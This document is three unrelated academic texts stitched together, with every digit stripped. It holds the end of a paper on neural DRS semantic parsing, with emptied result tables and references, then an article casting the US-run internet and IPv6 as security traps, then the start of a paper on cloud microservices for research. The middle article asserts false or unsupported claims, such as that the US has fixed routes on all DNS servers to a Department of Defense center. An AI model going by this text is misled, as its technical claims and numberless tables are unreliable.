silver versus bronze and boxer versus our parser. the results are shown in table . note that these experiments are per- formed to analyze the impact of the silver data, not to further push the score, meaning silver (boxer- generated) is our final model that will be com- pared to other approaches in § . for factor (i), we compare the performance of the model trained on silver and bronze versions of the exact same documents (so leaving out the man- ual corrections). interestingly, we score slightly higher for the character-level model with bronze than with silver (though the difference is not statis- tically significant), meaning that the extra manual corrections are not beneficial (in their current for- mat). this suggests that the silver data are closer to bronze than to the gold standard. for factor (ii), we use our own best parser (with- out silver data) to parse the sentences in the pmb silver data release and use that as additional train- ing data. because the silver data contain longer and more complicated sentences than the gold data, our best parser produces more ill-formed drss ( . % for char and . % for word). we can either discard those instances or still main- tain them for the model to learn from. for boxer this is not an issue since only . % of drss produced were ill-formed. we observe that a full self-training pipeline results in lower performance compared with using boxer-produced drss. in fact, this does not seem to be beneficial over only using the gold standard data. most likely, note that we cannot apply the manual corrections, so in pmb terminology, these data are bronze instead of silver. prec rec f-score spar . . . sim-spar . . . amr drs . . . boxer . . . neural char . . . neural word . . . neural char + silver . . . neural word + silver . . . table : test set results of our best neural models compared to two baseline models and two parsers. because boxer combines symbolic and statistical methods, it learns very different things from our neural parsers, which in turn provides more valu- able information to the model. a more detailed analysis on the difference in (semantic) output is performed in § . and . . removing ill-formed drss before training leads to higher f-scores for both the char and word parsers, as well as a lower number of ill-formed drss. discussion . comparison in this section, we compare our best neural mod- els (with and without silver data, see table ) with two baseline systems and with two drs parsers: amr drs and boxer. amr drs is a parser that obtains drss from amrs by apply- ing a set of rules (van noord et al., ), in our case using amrs produced by the amr parser of van noord and bos ( b). boxer is an existing drs parser using a statistical combinatory cate- gorical grammar parser for syntactic analysis and a compositional semantics based on λ-calculus, fol- lowed by pronoun and presupposition resolution (curran et al., ; bos, b). spar is a base- line parser that outputs the same (fixed) default drs for each input sentence. we implemented a second baseline model, sim-spar, which outputs, for each sentence in the test set, the drs of the most similar sentence in the training set. this sim- ilarity is calculated by taking the cosine similar- ity of the average word embedding vector (with removed stopwords) based on the glove embed- dings (pennington et al., ). table shows the result of the comparison. the neural models comfortably outperform the baselines. we see that both our neural models char word boxer all clauses . . . drs operators . . . verbnet roles . . . wordnet synsets . . . nouns . . . verbs, adverbs, adj. . . . oracle sense numbers . . . oracle synsets . . . oracle roles . . . table : f-scores of fine-grained evaluation on the test set of the three semantic parsers. outperform boxer by a large margin when using the boxer-labeled silver data. however, even with- out this dependence, the neural models perform significantly better than boxer. it is worth noting that the character-level model significantly outper- forms the word-level model, even though it can- not benefit from pre-trained word embeddings and from a tokenizer. concurrently with our work, a neural drs parser has been developed by liu et al. ( ). they use a customized neural seq seq model that produces the drs in three stages. it first pre- dicts the general (deep) structure of the drss, after which the conditions and referents are filled in. unfortunately, they train and evaluate their parser on annotated data from the gmb rather than from the pmb (see § ). this, combined with the fact that their work is contemporaneous to the current paper, make it difficult to compare the ap- proaches. however, we see no apparent reason why their method should not work on the pmb data. . analysis an intriguing question is what our models actually learn, and what parts of meaning are still challeng- ing for neural methods. we do this in two ways, by performing an automatic analysis and by doing a manual inspection on a variety of semantic phe- nomena. table shows an overview of the differ- ent automatic evaluation metrics we implemented, with corresponding scores of the three models. the character- and word-level systems perform comparably in all categories except for verbnet roles, where the character-based parser shows a clear advantage ( . percentage point difference). the score for wordnet synsets is similar, but sentence length (words) . . . . . . f- sc or e boxer char word figure : performance of each parser for sen- tences of different length. the word-level model has more difficulty predict- ing synsets that are introduced by verbs than for nouns. it is clear that the neural models outper- form boxer consistently on each of these met- rics (partly because boxer picks the first sense by default). what also stands out is the impact of the word senses: with a perfect word sense- disambiguation module (oracle senses), large im- provements can be gained for all three parsers. it is interesting to look at what errors the model makes in terms of producing ill-formed output. for both the neural parsers, only about % of the ill-formed drss are ill-formed because of a syntactic error in an individual clause (e.g., b agent x , where a fourth argument is missing), whereas all the other errors are due to a violated semantic constraint (see § . ). in other words, the produced output is a syntactically well-formed drs but is not interpretable. to find out how sentence length affects per- formance, we plot in figure the mean f-score obtained by each parser on input sentences of different lengths, from to words. we ob- serve that all the parsers degrade with sentence length. to identify whether any of the parsers de- grades significantly more than any other, we build a regression model in which we predict the f- score using as predictors the parser (char, word, and boxer), the sentence length, and the num- ber of clauses produced. according to the re- gression model, (i) the performance of all three shorter and longer sentences are excluded as there are fewer than input sentences for any such length—for ex- ample, there are only three sentences that have two words. systems decreases with sentence length, thus cor- roborating the trends shown in figure and (ii) the interaction between parser and sentence length is not significant (i.e., none of the parsers decreases significantly more than any other with sentence length). the fact that the performance of the neu- ral parsers degrades with sentence length is not surprising, because they are based on the seq seq architecture, and models built on this architecture for other tasks, such as machine translation, have been shown to have the same issue (toral and sánchez-cartagena, ). . manual inspection the automatic evaluation metrics provide overall scores but do not capture how the models per- form on certain semantic phenomena present in the drss. therefore, we manually inspected the test set output of the three parsers for the seman- tic phenomena listed in table . we here describe each phenomenon and explain how the parser out- put is evaluated on them. the negation & modals phenomenon cov- ers possibility (pos), necessity (nec), and nega- tion (not). the phenomenon is considered successfully captured if an automatically pro- duced clausal form has the clause with the modal operator and the main concept is correctly put under the scope of the modal operator. for exam- ple, to capture the negation in figure , the pres- ence of b not b and b afraid "a. " s is sufficient. scope ambiguity counts nested pairs of scopal operators such as possibility (pos), necessity (nec), negation (not), and implication (imp). pronoun resolution checks if an anaphoric pronoun and its antecedent are represented by the same discourse referent. discourse relation & implication involves deter- mining a discourse relation or an implication with a main concept in each of their scopes (i.e., boxes). for instance, to get the discourse relation in fig- ure correctly, a clausal form needs to include b continuation b b , b play "v. " e , and b sing "v. " e . finally, the embedded clauses phenomenon verifies whether the main verb concept of an embedded clause is placed inside the propositional box (prp). this phe- nomenon also covers control verbs: it checks whether a controlled argument of a subordinate verb is correctly identified as an argument of a control verb. phenomenon # char word boxer negation & modals . . . scope ambiguity . . . pronoun resolution . . . discourse rel. & imp. . . . embedded clauses . . . table : manual evaluation of the output of the three semantic parsers on several semantic phe- nomena. reported numbers are accuracies. the results of the semantic evaluation of the parsers on the test set is given in table . the character-level parser performs better than the word-level parser on all the phenomena ex- cept one. even though both our neural parsers clearly outperformed boxer in terms of f-score, they perform worse than boxer on the selected se- mantic phenomena. although the differences are not big, boxer obtained the highest score for four out of five phenomena. this suggests that just the f-score is perhaps not good enough as an evalua- tion metric, or that the final f-score should perhaps be weighted towards certain clauses. for example, it is arguably more important to capture a nega- tion correctly than tense. our current metric only gives a rough indication about the contents, but not about the inferential capabilities of the meaning representation. conclusions and future work we implemented a general, end-to-end neural seq seq model that is able to produce well-formed drss with high accuracy (rq ). character-level models can outperform word-level models, even though they are not dependent on tokenization and pre-trained word embeddings (rq ). it is beneficial to rewrite drs variables to a more general representation (rq ). obtaining and us- ing additional data can benefit performance as well, though it might be better to use an exter- nal parser rather than doing a full self-training pipeline (rq ). f-score is only a rough measure for semantic accuracy: boxer still outperformed our best neural models on a subset of specific semantic phenomena (rq ). we think there are many opportunities for fu- ture work. because the sentences in the pmb data set are relatively short, it makes sense to investi- gate seq seq models performing well for longer texts. there are a few promising directions here that could combat the degrading performance on longer sentences. first, the transformer model (vaswani et al., ) is an interesting candidate for exploration, a state-of-the-art neural model de- veloped for mt that does not have worse perfor- mance for longer sentences. second, a seq seq model that is able to first predict the general struc- ture of the drs, after which it can fill in the de- tails, similar to liu et al. ( ), is something that could be explored. a third possibility is a neural parser that tries to build the drs incrementally, producing clauses for different parts of the sen- tence individually, and then combining them to a final drs. concerning the evaluation of drs parsers, we feel there are a couple of issues that could be addressed in future work. one idea is to facil- itate computing f-scores tailored to specific se- mantic phenomena that are dubbed important, so the evaluation we performed in this paper manu- ally could be carried out automatically. another idea is to evaluate the application of drss to improve performance on other linguistic or seman- tic tasks in which drss that capture the full se- mantics will, presumably, have an advantage. a combination of glass-box and black-box evalua- tion seems a promising direction here (bos, a; van noord et al., ). acknowledgments this work was funded by the nwo-vici grant “lost in translation—found in meaning” ( - - ). the tesla k gpu used in this work was kindly donated to us by the nvidia corpo- ration. we also want to thank the three anonymous reviewers for their comments. references lasha abzianidze, johannes bjerva, kilian evang, hessel haagsma, rik van noord, pierre ludmann, duc-duy nguyen, and johan bos. . the parallel meaning bank: towards a multilingual corpus of translations annotated with compositional meaning representations. in proceedings of the th conference of the eu- ropean chapter of the association for compu- tational linguistics: volume , short papers, pages – , valencia, spain. association for computational linguistics. lasha abzianidze and johan bos. . towards universal semantic tagging. in proceedings of the th international conference on computa- tional semantics (iwcs ) – short papers, montpellier, france. association for computa- tional linguistics. david alvarez-melis and tommi s. jaakkola. . tree-structured decoding with doubly- recurrent neural networks. in proceedings of the international conference on learning repre- sentations (iclr). nicholas asher. . reference to abstract objects in discourse. kluwer academic publishers. nicholas. asher and alex. lascarides. . log- ics of conversation. studies in natural language processing. cambridge university press. laura banarescu, claire bonial, shu cai, madalina georgescu, kira griffitt, ulf hermjakob, kevin knight, philipp koehn, martha palmer, and nathan schneider. . abstract meaning representation for sem- banking. in proceedings of the th linguistic annotation workshop and interoperability with discourse, pages – , sofia, bulgaria. valerio basile, johan bos, kilian evang, and noortje venhuizen. . developing a large semantically annotated corpus. in proceedings of the eighth international conference on lan- guage resources and evaluation (lrec ), pages – , istanbul, turkey. david i. beaver. . presupposition projection in drt: a critical assesment. in the con- struction of meaning, pages – . stanford university. jonathan berant and percy liang. . seman- tic parsing via paraphrasing. in proceedings of the nd annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . johannes bjerva, barbara plank, and johan bos. . semantic tagging with deep resid- ual networks. in proceedings of coling , the th international conference on computational linguistics: technical papers, pages – , osaka, japan. http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://aclweb.org/anthology/w - http://aclweb.org/anthology/w - http://books.google.com.au/books?id=vd- yisfhbwc http://books.google.com.au/books?id=vd- yisfhbwc http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - patrick blackburn and johan bos. . repre- sentation and inference for natural language. a first course in computational semantics. csli. ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, shujian huang, matthias huck, philipp koehn, qun liu, varvara logacheva, christof monz, matteo negri, matt post, raphael rubino, lucia specia, and marco turchi. . find- ings of the conference on machine translation (wmt ). in proceedings of the second conference on machine translation, volume : shared task papers, pages – , copenhagen, denmark. association for computational linguistics. claire bonial, william j. corvey, martha palmer, volha petukhova, and harry bunt. . a hi- erarchical unification of lirics and verbnet semantic roles. in proceedings of the th ieee international conference on semantic comput- ing (icsc ), pages – . johan bos. a. let’s not argue about seman- tics. in proceedings of the th language resources and evaluation conference (lrec ), pages – , marrakech, morocco. johan bos. b. wide-coverage semantic anal- ysis with boxer. in semantics in text pro- cessing. step conference proceedings, volume of research in computational seman- tics, pages – . college publications. johan bos. . open-domain semantic pars- ing with boxer. in proceedings of the th nordic conference of computational linguis- tics (nodalida ), pages – . johan bos, valerio basile, kilian evang, noortje venhuizen, and johannes bjerva. . the groningen meaning bank. in nancy ide and james pustejovsky, editors, handbook of lin- guistic annotation. springer netherlands. denny britz, anna goldie, minh-thang luong, and quoc le. . massive exploration of neural machine translation architectures. in proceedings of the conference on empir- ical methods in natural language processing, pages – . nicolaas govert de bruijn. . lambda calcu- lus notation with nameless dummies, a tool for automatic formula manipulation, with applica- tion to the church-rosser theorem. in indaga- tiones mathematicae (proceedings), volume , pages – . elsevier. jan buys and phil blunsom. . robust incremental neural semantic graph parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . shu cai and kevin knight. . smatch: an evaluation metric for semantic feature struc- tures. in proceedings of the st annual meeting of the association for computa- tional linguistics (volume : short papers), pages – , sofia, bulgaria. association for computational linguistics. james curran, stephen clark, and johan bos. . linguistically motivated large-scale nlp with c&c and boxer. in proceedings of the th annual meeting of the association for computational linguistics companion volume proceedings of the demo and poster sessions, pages – , prague, czech republic. marco damonte, shay b. cohen, and giorgio satta. . an incremental parser for ab- stract meaning representation. in proceedings of the th conference of the european chapter of the association for computational linguis- tics: volume , long papers, pages – , valencia, spain. association for computational linguistics. michael denkowski and graham neubig. . stronger baselines for trustable results in neu- ral machine translation. in proceedings of the first workshop on neural machine translation, pages – , vancouver. association for com- putational linguistics. li dong and mirella lapata. . language to logical form with neural attention. in proceed- ings of the th annual meeting of the associ- ation for computational linguistics (volume : long papers), pages – , berlin, germany. association for computational linguistics. jan van eijck and hans kamp. . repre- senting discourse in context. in johan van http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.springer.com/la/book/ http://www.springer.com/la/book/ http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - benthem and alice ter meulen, editors, hand- book of logic and language, pages – . elsevier, mit. kilian evang, valerio basile, grzegorz chrupała, and johan bos. . elephant: sequence labeling for word and sentence segmentation. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp), pages – , seattle, washington, usa. christiane fellbaum, editor. . wordnet. an electronic lexical database. the mit press, cambridge, ma., usa. bart geurts. . presuppositions and pronouns, volume of current research in the semantic- s/pragmatics interface. elsevier. xiaodong he and david golub. . character- level question answering with attention. in proceedings of the conference on empir- ical methods in natural language processing, pages – . benjamin heinzerling and michael strube. . bpemb: tokenization-free pre-trained subword embeddings in languages. in proceedings of the eleventh international conference on language resources and evaluation (lrec ), paris, france. european language resources association (elra). robin jia and percy liang. . data recombina- tion for neural semantic parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . mark johnson and ewan klein. . discourse, anaphora and parsing. in th international conference on computational linguistics. pro- ceedings of coling ’ , pages – , univer- sity of bonn. nirit kadmon. . formal pragmatics. blackwell. hans kamp. . a theory of truth and se- mantic representation. in jeroen groenendijk, theo m.v. janssen, and martin stokhof, editors, truth, interpretation and information, pages – . foris, dordrecht – holland/ cinnaminson – u.s.a. hans kamp and uwe reyle. . from dis- course to logic; an introduction to model the- oretic semantics of natural language, formal logic and drt. kluwer, dordrecht. guillaume klein, yoon kim, yuntian deng, jean senellart, and alexander rush. . open- nmt: open-source toolkit for neural machine translation. in proceedings of acl , sys- tem demonstrations, pages – . association for computational linguistics. ioannis konstas, srinivasan iyer, mark yatskar, yejin choi, and luke zettlemoyer. . neu- ral amr: sequence-to-sequence models for parsing and generation. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , vancouver, canada. association for computational linguistics. phong le and willem zuidema. . learning compositional semantics for open domain se- mantic parsing. proceedings of coling , pages – . wang ling, phil blunsom, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, fumin wang, and andrew senior. . latent predictor networks for code generation. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . jiangming liu, shay b. cohen, and mirella lapata. . discourse representation struc- ture parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – , lisbon, portugal. association for computational linguistics. reinhard muskens. . combining montague semantics and discourse representation. lin- guistics and philosophy, : – . http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - rik van noord, lasha abzianidze, hessel haagsma, and johan bos. . evaluating scoped meaning representations. in proceed- ings of the eleventh international conference on language resources and evaluation (lrec ), paris, france. european language re- sources association (elra). rik van noord and johan bos. a. dealing with co-reference in neural semantic parsing. in proceedings of the nd workshop on semantic deep learning (semdeep- ), pages – . rik van noord and johan bos. b. neural semantic parsing by character-based transla- tion: experiments with abstract meaning rep- resentations. computational linguistics in the netherlands journal, : – . eric w. noreen. . computer-intensive meth- ods for testing hypotheses. wiley new york. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . fernando pereira and stuart shieber. . prolog and natural language analysis. csli lecture notes . chicago university press, stanford. rob a. van der sandt. . presupposition projection as anaphora resolution. journal of semantics, ( ): – . rico sennrich, barry haddow, and alexandra birch. a. edinburgh neural machine trans- lation systems for wmt . in proceedings of the first conference on machine transla- tion: volume , shared task papers, volume , pages – . rico sennrich, barry haddow, and alexandra birch. b. neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , berlin, germany. nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neu- ral networks from overfitting. the journal of machine learning research, ( ): – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neu- ral networks. in z. ghahramani, m. welling, c. cortes, n. d. lawrence, and k. q. weinberger, editors, advances in neural information pro- cessing systems , pages – . curran associates, inc. antonio toral and víctor m. sánchez-cartagena. . a multifaceted evaluation of neural versus phrase-based machine translation for language directions. in proceedings of the th conference of the european chapter of the association for computational linguistics: volume , long papers, pages – , valencia, spain. association for computational linguistics. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . hajime wada and nicholas asher. . buildrs: an implementation of dr theory and lfg. in th international conference on computational linguistics. proceedings of coling ’ , pages – , university of bonn. john m. zelle and raymond j. mooney. . learning to parse database queries using induc- tive logic programming. in proceedings of the national conference on artificial intelligence, pages – . https://doi.org/ . /jos/ . . https://doi.org/ . /jos/ . . http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - http://www.aclweb.org/anthology/e - international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - review of network technology system from the past, present to the future mou chengjin china international strategic research center of mobile communications joint association beijing, , china, e-mail: mcjzp @ .com guo xiaohui henan vocational college of agriculture zhengzhou, , china, e-mail: mcjzp @ .com abstract—since china's public network got access to the internet in , the study, research and understanding of the internet have been blindly superstitious to the united states for a long time, copying the rules and regulations of the united states, and the textbooks in the field of internet and information are almost completely americanized. for more than years, we have not formed our own systematic and profound research and practical views on the internet, most of which are based on the half understood, ignorant, and parrot- like knowledge and cognition instilled from the united states. being controlled by others in ideology is even worse than in technology. at present, china's understanding of the internet is very superficial from the superior to inferior. we failed to firmly grasp the technology controlled by others and legal key points. we didn’t adhere to independent innovation, which resulted in that we were repeatedly passive or even long-term passiveness in cyberspace strategies and tactics. this paper will start from the history and technical characteristics of the emergence of the internet, comprehensively discuss the problems that have existed since the emergence of the internet more than years ago, and reflect on the future development of the international network, making the internet a truly open and shared international network. keywords-network; internet; future network i. introduction the computer network refers to the computer system which can provide transmission, storage, analysis and sharing of data for the purpose of acquiring and mastering data. it serves for the needs of communication with others. two or more computer networks with communication protocol, transmission channel and infrastructure interoperability constitute a computer network interconnection and interworking system that connects and shares data. strictly speaking, it can be called interconnected network. future network or an international network system consists of all ubiquitous networks connected, interacting and sharing different carriers, sources, function-matching and operating purposes, whether wired or wireless, ground or space. the current internet is just a computer network using a single tcp/ip communication protocol, not two or more interconnected networks. it is not the interconnection or internet by the exact definition, so it can’t be called an interconnected net, or rather it may be called a computer connected system. if the origin is wrong, everything is wrong. this is especially true of our understanding of interconnected networks. what is the network? what is the interconnected network? what is the future network? what is the different or relationship between ipv , ipv or even ipv ? what are the fundamental drawbacks of internet architecture and principles? do we have safe, credible and effective response plans and coordination measures for the newly-emerging problems, new things, new technologies and new spaces in the process of intelligent network development? we all need to advance with the times to re-understand, redefine, re- explore and re-study it. we need to take the opportunity to seriously correct the deviation and mistakes in cognition and knowledge, and let the network users, the people across the country and our future generations know the facts in a practical way. ii. architecture of the internet it is generally believed that the american internet, which adopts ipv technical protocol, has entered the post ipv era due to the lack of address design. at present, renting ipv address and adopting ipv technical protocol constitute the internet of various mailto:mcjzp @ .com mailto:mcjzp @ .com international journal of advanced network, monitoring and controls volume , no. , countries, which is still the mainstream of computer network. the u.s. military says its ipv address can be used until the end of . in recent years, the united states has continued to assign ipv addresses to the united states and other countries around the world, excluding china. ipv protocol is designed to solve the problem of ipv address shortage. it can provide address scale, and that's all. the application and resolution of ipv address is still based on the network architecture of ipv , that is, the original, traditional and irreversible design architecture of the internet and the tree network architecture (ipv ) continuously improved, strengthened and tightly controlled by the u.s. government and military. it is inevitable that ipv can't interoperate with ipv in technology, which is bound to lead to the confusion of network architecture and operation. therefore, ipv special network architecture has to be rebuilt to replace ipv network architecture (involving almost all the network software and hardware of infrastructure), which constitutes a "subversion" of the internet based on ipv in fact. after more than ten years of transitional practice, the united states has found that the cost of rebuilding ipv network is too large, there are too many security traps, and the technical agreement is not mature. besides, "subverting" ipv has brought about a series of extremely serious problems in economy, society and military. in fact, the u.s. military and government have abandoned ipv transition plans since . in , the adoption rate of ipv in the united states dropped from the first in the world to the third. on july , , the internet engineering task force (ietf) of the united states issued rfc , which announced the latest standard (std ) of the sixth edition of internet protocol (ipv ). at the same time, it abandoned the rfc (ipv draft) proposed in december , and deleted the "next generation internet protocol ipng" which was in transition to ipv . over the past few years, the widespread introduction of new data protection regulations around the world is having a dramatic impact on technology companies and consumers around the world, resulting in some previously established best practices in ietf procedures and regulatory requirements becoming undesirable, the u.s. internet regional working group (intarea) said. please note that the u.s. internet engineering task force issued the official document rfc (bcp ) in may , namely, "intellectual property issues in ietf technology", which provide three basic principles for ietf to deal with internet intellectual property claims (discarding rfc and rfc simultaneously): ) the ietf will not determine the validity of any specific intellectual property claim. ) in following the normal practice? the ietf can decide to use technology that has been exposed as intellectual property if necessary. ) all participants in the ietf working group discussions must disclose known intellectual property rights or any intellectual property rights covered and likely to be covered under discussion and their recommenders. this requirement applies to all ip claimants, their employers, sponsors, or agents of ip claimants, without the need for patent searches. in this way, ietf tends to choose technologies with undeclared intellectual property rights, or technologies with free intellectual property rights; ietf may adopt technologies at its discretion, or not commit to licensing; and ietf specifications do not stipulate mandatory security technologies. therefore, ietf does not define the internal or external problems of the main patent technologies for ipv . so what's the practical significance of saying that china has more than ipv intellectual property rights? after all we are still subject to the united states and ietf! iii. the problem of ipv practice has proved that many ipv security traps occur and appear when ipv cannot interoperate with ipv , or when ipv is trying to run with the network architecture of ipv technical protocol. once they happen, they will not go away, just like opening pandora's box (security trap or temptation) of network security. for example: the design of interface id in ipv address will lead to the mandatory real name system for ordinary users in disguise. because ipv also stipulates that interface id can be allocated in other ways, even random number and manual way, the experts of ipv like hackers can easily hide their physical address. this state is no more insecure than ipv , but an astonishing security scandal once it is widely known, easily operated and arbitrarily adopted by ordinary users who have no knowledge of ipv . the gateway tunneling international journal of advanced network, monitoring and controls volume , no. , may also help hackers or spies of hostile camps hide their whereabouts, making hackers more difficult to find, or causing greater national strategic security problems. network address and addressing mode of ipv , data routing and exchange are real end-to-end, and there is no need for network address translation (nat). at the same time, the network identification of user equipment is directly exposed, which can be easily collected and used. through the cross aggregation and correlation analysis of multi-source and multi-element identification data, it is easy for humans and machines to be bound permanently, and thus beyond the current "precise push" (advertising) ability, deriving "precise tracking", "precise positioning", "precise strike", etc., with great potential security risks. ipv is applied to smart home, smart community, big data, cloud computing, etc. it may be "accurate" to the details of a family, a family member or the staff in the same office, etc., which is extremely dangerous. on the one hand, almost all servers of well-known websites are hosted abroad. for example, netease e- mail server is hosted on amazon's cloud service platform (aws). at least the ip address belongs to amazon. the risk and consequences of domain name and address being controlled are obvious. it is simply to hand over hundreds of millions of netease users to the u.s. central intelligence agency and its intelligence system (ic) members for all-round, all- view and all-time monitoring and supervision. amazon has publicly announced the provision of cloud services to the cia and its members of the intelligence system (ic), which is known as the "amazon cloud service platform secret zone" (aws, amazon web services). amazon called the service "the first and only commercial cloud provider to provide comprehensive data classification services to the government, including non-secret, sensitive, classified and top secret data." on the other hand, bind, the system software of dns server, has become the standard of implicit monopoly. almost all users in the world do not know the truth (the relevant national authorities and scientific research institutions have never issued a warning, nor have guided users taken any preventive and governance measures), that is, the united states has long been on all dns servers (ipv and ipv ) on the internet, solidified the necessary route to the network information center of the united states department of defense first. no matter what users are who, whether like it or not, all data and information exchanges must unconditionally comply with the security principles and measures of "american interests first". the great wall firewall is invalid for ipv . at present, ipv network in colleges and universities can easily log in the "forbidden network" of foreign countries (websites of religion, terror, anti-propaganda, etc.). another reason why ipv is not suitable to replace ipv is the conflict about ipv on the internet backbone network, which leads to the congestion of network flow. at present, there is no reliable technical solution. the overall comparison of ipv and ipv in the case of a single failure shows that in % countries, ipv connection is more reliable. an important discovery in ipv field is that many isps do not have correct network connection under normal operation conditions. for example, in the united states, only about % of autonomous systems (as) support ipv , while in china, china telecom (as ) only gets global connectivity through one service provider, hurricane electric (he), which is in worse condition. technically speaking, china's public network has fallen into the hands of others, the above-mentioned major ipv security risks (pitfalls, temptations and solidified routes, etc.) are not completely solved, and state organs and special departments, as well as important sensitive industries involving the national economy and people's livelihood, dare not use them. if it is used, the consequences will be unpredictable. the principles, systems, and strategies that us internet is dominated and controlled by the us military remain unchanged. the u.s. military has established and improved a network operation system with strict command and coordination from the top down, especially in the field of cyberspace, which is strictly regulated by the u.s. military. however, it is difficult for china to make a firm response to network operations in the first time, and to organize a high-speed, high-efficiency and high- intensity anti reaction capability of the military civilian joint network operation system in the first time. the current supervision, command and coordination system and framework of cyberspace in china are neither suitable for the perception situation of the internet in the united states, which has completed and improved the preparations for launching cyber war at any time in terms of technology and law, nor for the needs of accelerating the construction of cyber power and effectively responding to the united states' overall containment of china in cyberspace. international journal of advanced network, monitoring and controls volume , no. , iv. "two china" on the internet icann is suspected of deliberately manufacturing "two chinas" on the internet for a long time, deliberately setting the technical conditions and basis of "two chinas" that can cause network information confusion, and deliberately restraining, containing and interfering with china's autonomous and controllable development of sovereign and secure networks. according to the regulations of internet name and digital address distribution agency in the united states, some ip addresses are assigned to the five regional internet registries (rir) in the world, and then the five regional internet registries are respectively responsible for the registration services in the region. ip address and as number assignment for asia pacific countries are managed by the asia pacific network information center (apnic), which is established in australia. under the five regional internet registries, rir is divided into national registration agency nir and regional registration agency lir. the u.s. internet name and digital address distribution agency divides the asia pacific region into economies (countries and regions). the asia pacific network information center has seven core members (national registration agencies) who can enjoy special preferential conditions, including china, japan, south korea, vietnam, india, indonesia, and even taiwan. according to the official website of taiwan internet information center (twnic), founded in december , its original competent department was the ministry of transport of taiwan authorities. in december , it was changed into the national communication and broadcast commission and became the national network information center. in december , it was at a time when lee teng hui publicly supported chen shui bian's campaign for "president" and taiwan's independence was more active. on may , , a gun shot put chen shui bian on the throne of "president". since then, in the "internet" activities held around the world, taiwan's "national flag of the republic of china" has been put in the venue; taiwan's representatives of twnic, the "national registration agency", enjoy the same treatment as those of cnnic (china internet network information center) of the people’s republic of china. china has clearly declared the principle of "one china" sovereignty in international organizations, but why is the internet an exception? why should we tolerate the emergence of "two chinas" on the internet many years after china's full-featured access to the internet in ? it concerns the geopolitical issues of internet governance, the logical, physical and perceptual boundaries of internet monitoring, and the fact that taiwan can easily control china's data sovereignty and open-source information by using domain name rotation, data "transgenic" technology and other technologies. it concerns the sovereignty principle and security bottom line of china's cyberspace. this is not a simple technical issue, but a general political issue. china's “anti-segregation law”, issued in , clearly declared that there is only one china in the world, the mainland and taiwan belong to one china, and china's sovereignty and territorial integrity are inseparable. the state will never allow the "taiwan independence" secessionist forces to separate taiwan from china in any name or in any way. the fact that the "taiwan independence" secessionist forces split china in any name or in any way, the state may take non peaceful means and other necessary measures to safeguard its sovereignty and territorial integrity. any negligence on the sovereignty and security of cyberspace data (no matter professional or amateur) may lead to irreparable loss or disaster of cyberspace sovereignty and security (national sovereignty and security) at any time. how can one tolerate others encroaching on one's preserve? v. suggestion firstly, re-understand the internet and deepen the governance of the interconnected network. based on a wide range of opinions, we should open up and conduct large-scale discussions on the deployment of ipv , practically adjust our strategies and tactics in the field of cyberspace information, correctly guide and promote the construction and development of china’s sovereign network, future network, and the global community of destiny in cyberspace. secondly, re-consider the e-government extranet, comprehensive website and network infrastructure security, design and implement china's autonomous and controllable cyberspace security monitoring system. thirdly, thoroughly eliminate and eradicate the adverse effects, political weaknesses and technological constraints of "two chinas" on the internet. about the authors mou chengjin, the director of the international strategy research center of china mobile communications federation. the paper version was international journal of advanced network, monitoring and controls volume , no. , firstly published in chinese on december , , revised in january . if the chinese version was needed, please contact the author. email: mcjzp @ .com . guo xiaohui, associate professor of henan vocational college of agriculture. email: guoxiaohui@hnca.edu.cn submitted may accepted october published november corresponding author marco capuccini, marco.capuccini@farmbio.uu.se academic editor daniel katz additional information and declarations can be found on page doi . /peerj-cs. copyright capuccini et al. distributed under creative commons cc-by . open access on-demand virtual research environments using microservices marco capuccini , , anders larsson , matteo carone , jon ander novella , noureddin sadawi , jianliang gao , salman toor and ola spjuth department of information technology, uppsala university, uppsala, sweden department of pharmaceutical biosciences, uppsala university, uppsala, sweden national bioinformatics infrastructure sweden, uppsala university, uppsala, sweden department of surgery and cancer, imperial college london, london, united kingdom abstract the computational demands for scientific applications are continuously increasing. the emergence of cloud computing has enabled on-demand resource allocation. however, relying solely on infrastructure as a service does not achieve the degree of flexibility required by the scientific community. here we present a microservice-oriented methodology, where scientific applications run in a distributed orchestration platform as software containers, referred to as on-demand, virtual research environments. the methodology is vendor agnostic and we provide an open source implementation that supports the major cloud providers, offering scalable management of scientific pipelines. we demonstrate applicability and scalability of our methodology in life science applications, but the methodology is general and can be applied to other scientific domains. subjects bioinformatics, computational biology, distributed and parallel computing, scientific computing and simulation, software engineering keywords microservices, cloud computing, virtual research environments, application containers, orchestration introduction modern science is increasingly driven by compute and data-intensive processing. datasets are increasing in size and are not seldom in the range of gigabytes, terabytes or even petabytes and at the same time large-scale computations may require 